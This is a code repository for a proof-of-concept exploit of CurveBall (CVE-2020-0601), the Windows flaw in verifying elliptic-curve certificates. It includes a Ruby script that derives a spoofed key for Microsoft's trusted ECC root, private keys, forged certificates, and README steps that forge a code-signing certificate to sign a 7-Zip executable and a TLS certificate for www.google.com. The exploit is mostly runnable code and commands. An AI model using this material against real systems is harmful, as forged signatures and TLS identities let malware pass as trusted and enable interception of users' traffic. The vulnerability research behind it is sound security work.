├── code_signing ├── rogue.srl ├── cert.p12 ├── 7z1900-x64.exe ├── 7z1900-x64_signed.exe ├── cert.key ├── cert.csr ├── rogue.key ├── cert.crt └── rogue.crt ├── tls ├── cert.key ├── package.json ├── index.js ├── ca.crt ├── cert.crt └── spoofed_ca.crt ├── openssl_cs.conf ├── openssl_tls.conf ├── main.rb ├── MicrosoftECCProductRootCertificateAuthority.cer └── README.md /code_signing/rogue.srl: -------------------------------------------------------------------------------- 1 | 4ECC0F65072F6771824DBB7C943B304BFF0679AE 2 | -------------------------------------------------------------------------------- /code_signing/cert.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Quillor243/CurveBall/HEAD/code_signing/cert.p12 -------------------------------------------------------------------------------- /code_signing/7z1900-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Quillor243/CurveBall/HEAD/code_signing/7z1900-x64.exe -------------------------------------------------------------------------------- /code_signing/7z1900-x64_signed.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Quillor243/CurveBall/HEAD/code_signing/7z1900-x64_signed.exe -------------------------------------------------------------------------------- /tls/cert.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDCgd9P2yIE1qGFyV4fCF2+sh2ec4hpkhQ3kZJyaEFmagpwa2Pw7Q4yg 3 | kpOYTXxKwFGgBwYFK4EEACKhZANiAARz3A1gwlzjZSgCLFnMUv7KPoXR9EfjKFqH 4 | CYnqzRZLfGHd5Dtc9wSDUwtt1U8Tx2kfdabB+h9NREJAByaAZQ/rKzVy6Iup5i1w 5 | 7maxTwsRo83eScJYiQM7PfFBAnIMzLk= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /code_signing/cert.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDDSuSBvfWsoE7DAGzfwR9wgHiKN9KWecUdFe9QcPKJioPL6AiovxzO8 3 | ubQs+zds3pOgBwYFK4EEACKhZANiAARIi/X238exBb/lqDiGEzvGiwhWp7ndjxbC 4 | k4vwn9AXUFFQUO6WoLiovkVT8gZA7U5aq3OjvmkBcchRN+hREfT7D0GvX51i5i+Q 5 | ms7sK0pZmX0aamk3wkUAFMBJ+WplMPg= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /tls/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "tlsserver", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "express": "^4.17.1" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /openssl_cs.conf: -------------------------------------------------------------------------------- 1 | [ req ] 2 | prompt = no 3 | distinguished_name = dn 4 | 5 | [ dn ] 6 | C = DK 7 | ST = Denmark 8 | L = Copenhagen 9 | O = ollypwn 10 | CN = ollypwn 11 | 12 | [ v3_cs ] 13 | basicConstraints = critical, CA:FALSE 14 | subjectKeyIdentifier = hash 15 | keyUsage = digitalSignature 16 | extendedKeyUsage = codeSigning -------------------------------------------------------------------------------- /openssl_tls.conf: -------------------------------------------------------------------------------- 1 | [ req ] 2 | prompt = no 3 | distinguished_name = dn 4 | 5 | [ dn ] 6 | C = DK 7 | ST = Denmark 8 | L = Copenhagen 9 | O = ollypwn 10 | CN = www.google.com 11 | 12 | [ v3_tls ] 13 | basicConstraints = critical, CA:FALSE 14 | subjectKeyIdentifier = hash 15 | keyUsage = digitalSignature, keyEncipherment 16 | extendedKeyUsage = serverAuth, clientAuth -------------------------------------------------------------------------------- /tls/index.js: -------------------------------------------------------------------------------- 1 | const app = require('express')(); 2 | const https = require('https'); 3 | const fs = require('fs'); 4 | 5 | //GET home route 6 | app.get('/', (req, res) => { 7 | res.send('
Hello World
'); 8 | }); 9 | 10 | https.createServer({ 11 | key: fs.readFileSync('./cert.key'), 12 | cert: fs.readFileSync('./cert.crt'), 13 | ca: [ 14 | fs.readFileSync('./spoofed_ca.crt') 15 | ] 16 | }, app) 17 | .listen(8080); -------------------------------------------------------------------------------- /main.rb: -------------------------------------------------------------------------------- 1 | require 'openssl' 2 | 3 | raw = File.read ARGV[0] 4 | ca = OpenSSL::X509::Certificate.new(raw) # Read certificate 5 | ca_key = ca.public_key # Parse public key from CA 6 | 7 | ca_key.private_key = 1 # Set a private key, which will match Q = d'G' 8 | group = ca_key.group 9 | group.set_generator(ca_key.public_key, group.order, group.cofactor) 10 | group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE 11 | ca_key.group = group # Set new group with fake generator G' = Q 12 | 13 | File.open("spoofed_ca.key", 'w') { |f| f.write ca_key.to_pem } -------------------------------------------------------------------------------- /code_signing/cert.csr: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBsTCCATcCAQAwWDELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzAR 3 | BgNVBAcMCkNvcGVuaGFnZW4xEDAOBgNVBAoMB29sbHlwd24xEDAOBgNVBAMMB29s 4 | bHlwd24wdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARIi/X238exBb/lqDiGEzvGiwhW 5 | p7ndjxbCk4vwn9AXUFFQUO6WoLiovkVT8gZA7U5aq3OjvmkBcchRN+hREfT7D0Gv 6 | X51i5i+Qms7sK0pZmX0aamk3wkUAFMBJ+WplMPigYDBeBgkqhkiG9w0BCQ4xUTBP 7 | MAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFD3VN00KbLZn3BAYmWLO1fpQBoidMAsG 8 | A1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzAKBggqhkjOPQQDAgNoADBl 9 | AjB139MYuecW6hMvEC/NlH0QkPpCLpjXoTnWXOgAVAUnL8dI3TJIIZZuvGh0/bzU 10 | 0wgCMQCP+xKNsO3MYmJz17MmMZgoWkXvvdWwxXnP9wZ6FcunoBUbtQL42ULWs3BR 11 | 2+RtaBo= 12 | -----END CERTIFICATE REQUEST----- 13 | -------------------------------------------------------------------------------- /code_signing/rogue.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIIB+gIBAQQwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 3 | AAAAAAAAAAABoIIBWzCCAVcCAQEwPAYHKoZIzj0BAQIxAP////////////////// 4 | ///////////////////////+/////wAAAAAAAAAA/////zB7BDD///////////// 5 | /////////////////////////////v////8AAAAAAAAAAP////wEMLMxL6fiPufk 6 | mI4Fa+P4LRkYHZxu/oFBEgMUCI9QE4daxlY5jYou0Z0qhcjt0+wq7wMVAKM1kmqj 7 | GaJ6HQCJamdzpIJ6zaxzBGEExxEWKnYdVo6+uWJl1MPOtPDDMOyPbdduObzISaur 8 | uONDeNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh 9 | 6smPyX4Yyy87LEh6fab0AQesAjEA////////////////////////////////x2NN 10 | gfQ3Ld9YGg2ySLCneuzsGWrMxSlzAgEBoWQDYgAExxEWKnYdVo6+uWJl1MPOtPDD 11 | MOyPbdduObzISauruONDeNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5f 12 | NC3uF/0V+34nijKh6smPyX4Yyy87LEh6fab0AQes 13 | -----END EC PRIVATE KEY----- 14 | -------------------------------------------------------------------------------- /tls/ca.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICIDCCAaagAwIBAgIUAa53SYGVPJmIsm0UB41pKMvH71IwCgYIKoZIzj0EAwIw 3 | RzELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xETAPBgNVBAoMCEBvbGx5cHduMB4XDTIwMDExNjE1MzYyM1oXDTIwMDIx 5 | NTE1MzYyM1owRzELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNV 6 | BAcMCkNvcGVuaGFnZW4xETAPBgNVBAoMCEBvbGx5cHduMHYwEAYHKoZIzj0CAQYF 7 | K4EEACIDYgAEcSXlrfsOkX1M2VhmAqUpStKw4onqbgtvCvSTfRf0lJ8IQqYlTjVH 8 | CI5KpD/It9N+SxrPl4+sEweWslsORgEpFsxXyleShS6x9ZY4U7Cujp8g+TDgbtVM 9 | X2paVu11tq2po1MwUTAdBgNVHQ4EFgQUID+a1V804ozxVKHX8vtebC37fc0wHwYD 10 | VR0jBBgwFoAUID+a1V804ozxVKHX8vtebC37fc0wDwYDVR0TAQH/BAUwAwEB/zAK 11 | BggqhkjOPQQDAgNoADBlAjEA2LtHHRykAEUjxUDhKwy/nUmp8W5XJMQ+nl9NBE3X 12 | oN6p7SOo2uIsHS/6Nps0KL7lAjA29AC/iYd+Dy2wpXdwoQ5LX8C4mm6qRP0oPYjb 13 | Fc0rALwCh5wxy3c1cC12l3GemIo= 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /code_signing/cert.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICLjCCAbSgAwIBAgIUTswPZQcvZ3GCTbt8lDswS/8Gea4wCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB09MTFlQV04wHhcNMjAwMTE2MTMzNDMxWhcNNDcwNjAz 5 | MTMzNDMxWjBYMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHb2xseXB3bjEQMA4GA1UEAwwHb2xseXB3 7 | bjB2MBAGByqGSM49AgEGBSuBBAAiA2IABEiL9fbfx7EFv+WoOIYTO8aLCFanud2P 8 | FsKTi/Cf0BdQUVBQ7paguKi+RVPyBkDtTlqrc6O+aQFxyFE36FER9PsPQa9fnWLm 9 | L5CazuwrSlmZfRpqaTfCRQAUwEn5amUw+KNRME8wDAYDVR0TAQH/BAIwADAdBgNV 10 | HQ4EFgQUPdU3TQpstmfcEBiZYs7V+lAGiJ0wCwYDVR0PBAQDAgeAMBMGA1UdJQQM 11 | MAoGCCsGAQUFBwMDMAoGCCqGSM49BAMCA2gAMGUCMQDH9ZlXKwILXNrQ55ddK6sb 12 | 8TrWOwQT32VNyBoTHBBaiBhGefbg7D5D9IEwKy+6BpkCMB5zln4X5Rb8tYTNFWZD 13 | GsxocqoQAX4vDbkZKXfNE/9P/YouF/CYZxzIq878eO4wQA== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /tls/cert.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICPzCCAcWgAwIBAgIUVRcUbH7UP5+4QM8NioaLvcMMH8AwCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB29sbHlwd24wHhcNMjAwMTE2MTU0NjAwWhcNNDcwNjAz 5 | MTU0NjAwWjBfMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHb2xseXB3bjEXMBUGA1UEAwwOd3d3Lmdv 7 | b2dsZS5jb20wdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARz3A1gwlzjZSgCLFnMUv7K 8 | PoXR9EfjKFqHCYnqzRZLfGHd5Dtc9wSDUwtt1U8Tx2kfdabB+h9NREJAByaAZQ/r 9 | KzVy6Iup5i1w7maxTwsRo83eScJYiQM7PfFBAnIMzLmjWzBZMAwGA1UdEwEB/wQC 10 | MAAwHQYDVR0OBBYEFH/VYukGT+BkV0OIPio8/ns69feAMAsGA1UdDwQEAwIFoDAd 11 | BgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwCgYIKoZIzj0EAwIDaAAwZQIx 12 | APEbRxUst4bOQWemrmmmMNkRTeQjc5Mstu3o+qCAPlrsVSX2O1VELqdio8O1FDHr 13 | MwIwBRh6yfwRhRnb71EJx67An0mTzj59YbvWjsM0uW73kxQc+Y2rPPAW+chXjb/K 14 | pZtM 15 | -----END CERTIFICATE----- 16 | -------------------------------------------------------------------------------- /MicrosoftECCProductRootCertificateAuthority.cer: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDIzCCAqigAwIBAgIQFJgmZtx8zY9AU2d7uZnshTAKBggqhkjOPQQDAzCBlDEL 3 | MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v 4 | bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjE+MDwGA1UEAxM1TWlj 5 | cm9zb2Z0IEVDQyBQcm9kdWN0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw 6 | MTgwHhcNMTgwMjI3MjA0MjA4WhcNNDMwMjI3MjA1MDQ2WjCBlDELMAkGA1UEBhMC 7 | VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV 8 | BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjE+MDwGA1UEAxM1TWljcm9zb2Z0IEVD 9 | QyBQcm9kdWN0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTgwdjAQBgcq 10 | hkjOPQIBBgUrgQQAIgNiAATHERYqdh1Wjr65YmXUw8608MMw7I9t1245vMhJq6u4 11 | 40N41YEGXe/HfZ/O1rOQdd4MsJDeI7rI0T5n4BmpG4YxHl80Le4X/RX7fieKMqHq 12 | yY/JfhjLLzssSHp9pvQBB6yjgbwwgbkwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB 13 | /wQFMAMBAf8wHQYDVR0OBBYEFEPvcIe4nb/siBncxsRrdQ11NDMIMBAGCSsGAQQB 14 | gjcVAQQDAgEAMGUGA1UdIAReMFwwBgYEVR0gADBSBgwrBgEEAYI3TIN9AQEwQjBA 15 | BggrBgEFBQcCARY0aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2Nz 16 | L1JlcG9zaXRvcnkuaHRtADAKBggqhkjOPQQDAwNpADBmAjEAocBJRF0yVSfMPpBu 17 | JSKdJFubUTXHkUlJKqP5b08czd2c4bVXyZ7CIkWbBhVwHEW/AjEAxdMo63LHPrCs 18 | Jwl/Yj1geeWS8UUquaUC5GC7/nornGCntZkU8rC+8LsFllZWj8Fo 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /tls/spoofed_ca.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDdTCCAvygAwIBAgIUBXWtY5Dvu9hUH0cFzUx/UxCp4X0wCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB29sbHlwd24wHhcNMjAwMTE2MTU0MDQyWhcNMjAwMjE1 5 | MTU0MDQyWjBGMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHb2xseXB3bjCCAcwwggFkBgcqhkjOPQIB 7 | MIIBVwIBATA8BgcqhkjOPQEBAjEA//////////////////////////////////// 8 | //////7/////AAAAAAAAAAD/////MHsEMP////////////////////////////// 9 | ///////////+/////wAAAAAAAAAA/////AQwszEvp+I+5+SYjgVr4/gtGRgdnG7+ 10 | gUESAxQIj1ATh1rGVjmNii7RnSqFyO3T7CrvAxUAozWSaqMZonodAIlqZ3OkgnrN 11 | rHMEYQTHERYqdh1Wjr65YmXUw8608MMw7I9t1245vMhJq6u440N41YEGXe/HfZ/O 12 | 1rOQdd4MsJDeI7rI0T5n4BmpG4YxHl80Le4X/RX7fieKMqHqyY/JfhjLLzssSHp9 13 | pvQBB6wCMQD////////////////////////////////HY02B9Dct31gaDbJIsKd6 14 | 7OwZaszFKXMCAQEDYgAExxEWKnYdVo6+uWJl1MPOtPDDMOyPbdduObzISauruOND 15 | eNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh6smP 16 | yX4Yyy87LEh6fab0AQeso1MwUTAdBgNVHQ4EFgQUQ+9wh7idv+yIGdzGxGt1DXU0 17 | MwgwHwYDVR0jBBgwFoAUQ+9wh7idv+yIGdzGxGt1DXU0MwgwDwYDVR0TAQH/BAUw 18 | AwEB/zAKBggqhkjOPQQDAgNnADBkAjBlVWKmhCLbxs2OCgIlHkudZ09s1v2F1tsV 19 | PddB+Aaw+l/nwmGxi/QHtocsjLSy1gACMCnXgQ69XzMc1LTp/WuZBFkvxRc3qe3Q 20 | ZL7MX5o0vVldH0ic2HjAc15hgiLz6zbuEw== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /code_signing/rogue.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDdzCCAvygAwIBAgIUbZPNgW325oB9l/76AqUG6GJDaB8wCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB09MTFlQV04wHhcNMjAwMTE2MTMzNDExWhcNMjAwMjE1 5 | MTMzNDExWjBGMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHT0xMWVBXTjCCAcwwggFkBgcqhkjOPQIB 7 | MIIBVwIBATA8BgcqhkjOPQEBAjEA//////////////////////////////////// 8 | //////7/////AAAAAAAAAAD/////MHsEMP////////////////////////////// 9 | ///////////+/////wAAAAAAAAAA/////AQwszEvp+I+5+SYjgVr4/gtGRgdnG7+ 10 | gUESAxQIj1ATh1rGVjmNii7RnSqFyO3T7CrvAxUAozWSaqMZonodAIlqZ3OkgnrN 11 | rHMEYQTHERYqdh1Wjr65YmXUw8608MMw7I9t1245vMhJq6u440N41YEGXe/HfZ/O 12 | 1rOQdd4MsJDeI7rI0T5n4BmpG4YxHl80Le4X/RX7fieKMqHqyY/JfhjLLzssSHp9 13 | pvQBB6wCMQD////////////////////////////////HY02B9Dct31gaDbJIsKd6 14 | 7OwZaszFKXMCAQEDYgAExxEWKnYdVo6+uWJl1MPOtPDDMOyPbdduObzISauruOND 15 | eNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh6smP 16 | yX4Yyy87LEh6fab0AQeso1MwUTAdBgNVHQ4EFgQUQ+9wh7idv+yIGdzGxGt1DXU0 17 | MwgwHwYDVR0jBBgwFoAUQ+9wh7idv+yIGdzGxGt1DXU0MwgwDwYDVR0TAQH/BAUw 18 | AwEB/zAKBggqhkjOPQQDAgNpADBmAjEA88Jz9VIOOprtVppEgIM32y3DmQf1T+B/ 19 | 2aFpcuPC/A1Q6ELhx1U6ouc/63aXaxr4AjEA0II/b9XFXJZabdFzR1iKHvzUe4HA 20 | B9Mi33aEPCq4fH3zjN37qiIvPv4s8rNMKY+n 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CurveBall (CVE-2020-0601) - PoC 2 | CVE-2020-0601, or commonly referred to as CurveBall, is a vulnerability in which the signature of certificates using elliptic curve cryptography (ECC) is not correctly verified. 3 | 4 | ECC relies on different parameters. These parameters are standardized for many curves. However, Microsoft didn't check all these parameters. The parameter `G` (the generator) was not checked, and the attacker can therefore supply his own generator, such that when Microsoft tries to validate the certificate against a trusted CA, it'll only look for matching public keys, and then use then use the generator of the certificate. NSA explains the impact of this vulnerability and more [here](https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF). 5 | 6 | `MicrosoftECCProductRootCertificateAuthority.cer` is by default a trusted root certificate authority (CA) using ECC on Windows 10. Anything signed with this certificate will therefore automatically be trusted. 7 | 8 | **Minimum requirements** 9 | `openssl 1.1.0` 10 | `ruby 2.4.0` 11 | 12 | ## Mathematical details 13 | If you're interested in the mathematical details of the vulnerability, please read more [here](https://news.ycombinator.com/item?id=22048619). 14 | 15 | In order to spoof the certificate, we set the following parameters: 16 | 17 | d' = 1 18 | G' = Q 19 | Such that `Q = Q' = d'G'`. 20 | 21 | ## Usage 22 | Create a certificate with the same public key and parameters of a trusted CA. This will be used as our spoofing CA. Set the generator to a value, where you know the private key. You can easily set the generator to the public key, and have a private key set to `1`, since `Q = dG`. 23 | 24 | Next up, you create a certificate signing request with the extensions you wish to use, e.g. code signing or server authentication. 25 | 26 | Sign this certificate request with your spoofed CA and CA key, and add the usage extensions. 27 | 28 | Bundle the signed certificate request (now a regular certificate) with the spoofed CA, and you have a signed and trusted certificate. 29 | 30 | When Windows checks whether the certificate is trusted, it'll see that it has been signed by our spoofed CA. It then looks at the spoofed CA's public key to check against trusted CA's. Then it simply verifies the signature of our spoofed CA with the spoofed CA's generator - this is the issue. 31 | 32 | If you choose to open your newly and signed, trusted certificate in Windows, it'll not recognize it as trusted, since it hasn't been tied to anything, thus it will not use the spoofed CA. The certificate must always present itself with the spoofed CA. 33 | 34 | ## Code Signing 35 | *Please use this for educational and researching purposes only.* 36 | 37 | Extract the public key from the CA and modify it according to the vulnerability: 38 | 39 | ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer 40 | Generate a new x509 certificate based on this key. This will be our own spoofed CA. 41 | 42 | openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt 43 | Generate a new key. This key can be of any type you want. It will be used to create a code signing certificate, which we will sign with our own CA. 44 | 45 | openssl ecparam -name secp384r1 -genkey -noout -out cert.key 46 | Next up, create a new certificate signing request (CSR). This request will oftenly be sent to trusted CA's, but since we have a spoofed one, we can sign it ourselves. 47 | 48 | openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs 49 | Sign your new CSR with our spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043. 50 | 51 | openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs 52 | The only thing left is to pack the certificate, its key and the spoofed CA into a PKCS12 file for signing executables. 53 | 54 | openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12 55 | Sign your executable with PKCS12 file. 56 | 57 | osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe 58 | 59 | ## SSL/TLS 60 | *Please use this for educational and researching purposes only.* 61 | Extract the public key from the CA and modify it according to the vulnerability: 62 | 63 | ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer 64 | Generate a new x509 certificate based on this key. This will be our own spoofed CA. 65 | 66 | openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt 67 | Generate a new key. This key be of any type you want. It will be used to create a SSL certificate, which we will sign with our own CA. 68 | 69 | openssl ecparam -name secp384r1 -genkey -noout -out cert.key 70 | Next up, create a new certificate signing request (CSR). This request will oftenly be sent to trusted CA's, but since we have a spoofed one, we can sign it ourselves. 71 | 72 | If you wish to change the domain name, edit `CN = www.google.com` to `CN = www.example.com` inside of `openssl_tls.conf`. 73 | 74 | openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls 75 | Sign your new CSR with our spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043. 76 | 77 | openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_tls.conf -extensions v3_tls 78 | You can now use `cert.crt`, `cert.key`, and `spoofed_ca.crt` to serve your content. Again, remember to add the spoofed_ca.crt as a certificate chain in your server's HTTPS configuration. 79 | 80 | See the usage example in [tls/index.js](https://github.com/ollypwn/CVE-2020-0601/blob/master/tls/index.js). 81 | --------------------------------------------------------------------------------